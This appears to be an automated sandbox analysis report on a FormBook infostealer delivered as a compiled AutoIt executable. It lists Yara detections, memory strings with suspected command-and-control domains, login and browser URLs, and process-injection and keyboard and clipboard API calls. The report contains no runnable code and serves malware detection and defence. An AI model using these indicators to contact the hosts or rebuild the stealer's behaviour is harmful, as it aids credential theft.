                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Deacapalla.online
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.online
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=ns
                Source: XBOIFKGKIWT.exe, 00000008.00000002.4014572631.0000000004C99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.infovea.tech
                Source: XBOIFKGKIWT.exe, 00000008.00000002.4014572631.0000000004C99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.infovea.tech/3irn/
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004334000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: RmClient.exe, 00000006.00000003.2788289756.000000000773C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00534164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00534164
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00534164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00534164
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00533F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00533F66
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0052001C
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0054CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0054CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4014572631.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2454199303.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2454931273.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: This is a third-party compiled AutoIt script.0_2_004C3B3A
                Source: 9MZZG92yMO.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 9MZZG92yMO.exe, 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7bf626e8-8
                Source: 9MZZG92yMO.exe, 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_32a3a2d0-c
                Source: 9MZZG92yMO.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6a6fce1a-5
                Source: 9MZZG92yMO.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_76b5933b-0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C083 NtClose,2_2_0042C083
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA68 NtDelayExecution,2_2_0040AA68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03872C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,2_2_038735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874340 NtSetContextThread,2_2_03874340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874650 NtSuspendThread,2_2_03874650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BF0 NtAllocateVirtualMemory,2_2_03872BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AD0 NtReadFile,2_2_03872AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F90 NtProtectVirtualMemory,2_2_03872F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FB0 NtResumeThread,2_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FE0 NtCreateFile,2_2_03872FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F30 NtCreateSection,2_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E80 NtReadVirtualMemory,2_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EA0 NtAdjustPrivilegesToken,2_2_03872EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DD0 NtDelayExecution,2_2_03872DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D10 NtMapViewOfSection,2_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D30 NtUnmapViewOfSection,2_2_03872D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CA0 NtQueryInformationToken,2_2_03872CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C60 NtCreateKey,2_2_03872C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873090 NtSetValueKey,2_2_03873090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D70 NtOpenThread,2_2_03873D70
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D04340 NtSetContextThread,LdrInitializeThunk,6_2_02D04340
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D04650 NtSuspendThread,LdrInitializeThunk,6_2_02D04650
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02AD0 NtReadFile,LdrInitializeThunk,6_2_02D02AD0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02AF0 NtWriteFile,LdrInitializeThunk,6_2_02D02AF0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02D02BF0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02D02BE0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02D02BA0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02B60 NtClose,LdrInitializeThunk,6_2_02D02B60
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02D02EE0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02D02E80
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02FE0 NtCreateFile,LdrInitializeThunk,6_2_02D02FE0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02FB0 NtResumeThread,LdrInitializeThunk,6_2_02D02FB0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02F30 NtCreateSection,LdrInitializeThunk,6_2_02D02F30
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02D02CA0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02D02C70
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02C60 NtCreateKey,LdrInitializeThunk,6_2_02D02C60
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02DD0 NtDelayExecution,LdrInitializeThunk,6_2_02D02DD0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02D02DF0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02D02D10
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02D02D30
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D035C0 NtCreateMutant,LdrInitializeThunk,6_2_02D035C0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D039B0 NtGetContextThread,LdrInitializeThunk,6_2_02D039B0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02AB0 NtWaitForSingleObject,6_2_02D02AB0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02B80 NtQueryInformationFile,6_2_02D02B80
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02EA0 NtAdjustPrivilegesToken,6_2_02D02EA0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02E30 NtWriteVirtualMemory,6_2_02D02E30
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02F90 NtProtectVirtualMemory,6_2_02D02F90
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02FA0 NtQuerySection,6_2_02D02FA0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02F60 NtCreateProcessEx,6_2_02D02F60
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02CC0 NtQueryVirtualMemory,6_2_02D02CC0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02CF0 NtOpenProcess,6_2_02D02CF0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02C00 NtQueryInformationProcess,6_2_02D02C00
